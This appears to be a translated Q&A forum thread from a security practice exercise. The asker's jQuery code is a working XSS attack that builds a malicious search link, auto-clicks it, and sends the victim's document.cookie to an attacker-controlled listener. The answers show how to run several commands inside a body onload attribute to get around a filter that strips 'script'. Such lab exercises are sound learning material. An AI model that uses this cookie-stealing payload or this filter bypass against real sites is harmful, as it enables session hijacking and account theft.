这是来自网络安全实践问题。
网站(为此目的而设置)尝试使用以下代码过滤“脚本”标记来防止XSS:
filtered = re.sub(r"(?i)script", "", input)
任务是在受害者的浏览器中执行有效负载,这样做可以将其cookie发送到远程netcat连接。 (当网站没有过滤'脚本'时,我已经完成了这个)。
我研究了这个,发现我可以通过查询来执行单个javascript命令:
"<body onload=alert(\"hello\");>"
然而,这并没有解决我的问题,因为它只能执行一个命令(我相信)。我需要执行的有效负载包含多个命令。
我也尝试使用HTML字符代码来避免过滤器,例如:
"<script>..."
但过滤器抓住了它。
以下是我正在使用的代码库:
<html>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script>
function payload(attacker) {
function log(data) {
$.get(attacker, data);
}
function proxy(href) {
$("html").load(href, function(){
//Send cookie to remote connection
log(document.cookie);
});
}
proxy("./");
}
function makeLink(xssdefense, target, attacker) {
if (xssdefense == 0) {
//Code to execute when there is no filter
return target + "./search?xssdefemse=" + xssdefense.toString() + "&q=" +
encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");</script" + ">");
}
else {
//Code to execute when 'script' is filtered
return target + "./search?xssdefemse=" + xssdefense.toString() + "&q=" +
encodeURIComponent("<body onload=alert(\"test\");>");
}
}
var xssdefense = 1;
var target = "http://81.211.34.1/xsstest";
var attacker = "http://127.0.0.1:31337/";
$(function() {
var url = makeLink(xssdefense, target, attacker);
$("h3").html("<a id=\"link\" target=\"run\" href=\"" + url + "\"> Enter Site!<\a>");
document.getElementById("link").click();
});
</script> <h3></h3>
</html>
非常感谢任何帮助!
答案 0 :(得分:4)
onload=属性中只能有一个表达式,但您仍然可以执行多个命令。
<body onload="(function() { cmd1(); cmd2(); cmd3(); })();">
这定义了一个函数表达式,它执行3个命令,然后被调用(最后是())。
<body onload="cmd1(), cmd2(), cmd3();">
或者,如果你知道他们都返回了虚假的值(比如undefined没有返回任何内容)
<body onload="cmd1() || cmd2() || cmd3();">
相反,如果你知道它们都返回真值(如数字,字符串或对象)
<body onload="cmd1() && cmd2() && cmd3();">
答案 1 :(得分:1)
你可以在onload中有多个表达式:
<body onload="alert(1); alert(2);">